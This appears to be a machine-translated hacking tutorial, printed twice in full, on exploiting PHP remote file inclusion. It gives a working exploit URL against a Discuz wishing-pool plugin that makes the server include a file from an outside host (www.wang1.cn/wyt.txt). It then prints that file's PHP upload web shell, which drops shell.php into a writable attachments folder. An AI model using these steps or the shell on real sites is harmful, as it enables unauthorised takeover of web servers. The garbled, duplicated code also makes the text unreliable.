How php Remote File Inclusion Vulnerability works

Suppose the code of index.php in the main page file is as follows:
<?
Include ($ page );
?>
Because the $ page variable lacks adequate filtering, the system does not determine whether the $ page is local or on a remote server. Therefore, we can specify the file on the remote server and submit it to the $ page variable as a parameter, allow us to execute our remote files with web permissions.

In this way, we can submit:
Http://www.bkjia.com/index.php? Page = http: // remote server/file name
We only need to set the remote file as our PHP Trojan so that we can get a Webshell.

Let's look at the discuz wishing board's Remote File Inclusion Vulnerability:

Problems with the wish. php file of the wishing pool plug-in:
Require $ discuz_root ../include/discuzcode. func. php;

The discuz_root variable is not strictly filtered. Usage:
Http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt?
You do not need a txt suffix. You can change it to any suffix. You must add a question mark later.
Here wyt.txt writes a shell using the pony of CN. Tink:
<? Copy ($ _ FILES [MyFile] [tmp_name], "./attachments/shell. php");?>
<Form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST">
<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>
The website physical path can be submitted through http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt, see the error message, then modify the shell.txt path. Shell. php is the name of the uploaded shell.
Unix settings are relatively BT,./attachments/This directory is generally writable.

Suppose the code of index.php in the main page file is as follows:
<?
Include ($ page );
?>
Because the $ page variable lacks adequate filtering, the system does not determine whether the $ page is local or on a remote server. Therefore, we can specify the file on the remote server and submit it to the $ page variable as a parameter, allow us to execute our remote files with web permissions.

In this way, we can submit:
Http://www.bkjia.com/index.php? Page = http: // remote server/file name
We only need to set the remote file as our PHP Trojan so that we can get a Webshell.

Let's look at the discuz wishing board's Remote File Inclusion Vulnerability:

Problems with the wish. php file of the wishing pool plug-in:
Require $ discuz_root ../include/discuzcode. func. php;

The discuz_root variable is not strictly filtered. Usage:
Http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt?
You do not need a txt suffix. You can change it to any suffix. You must add a question mark later.
Here wyt.txt writes a shell using the pony of CN. Tink:
<? Copy ($ _ FILES [MyFile] [tmp_name], "./attachments/shell. php");?>
<Form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST">
<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>
The website physical path can be submitted through http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt, see the error message, then modify the shell.txt path. Shell. php is the name of the uploaded shell.
Unix settings are relatively BT,./attachments/This directory is generally writable.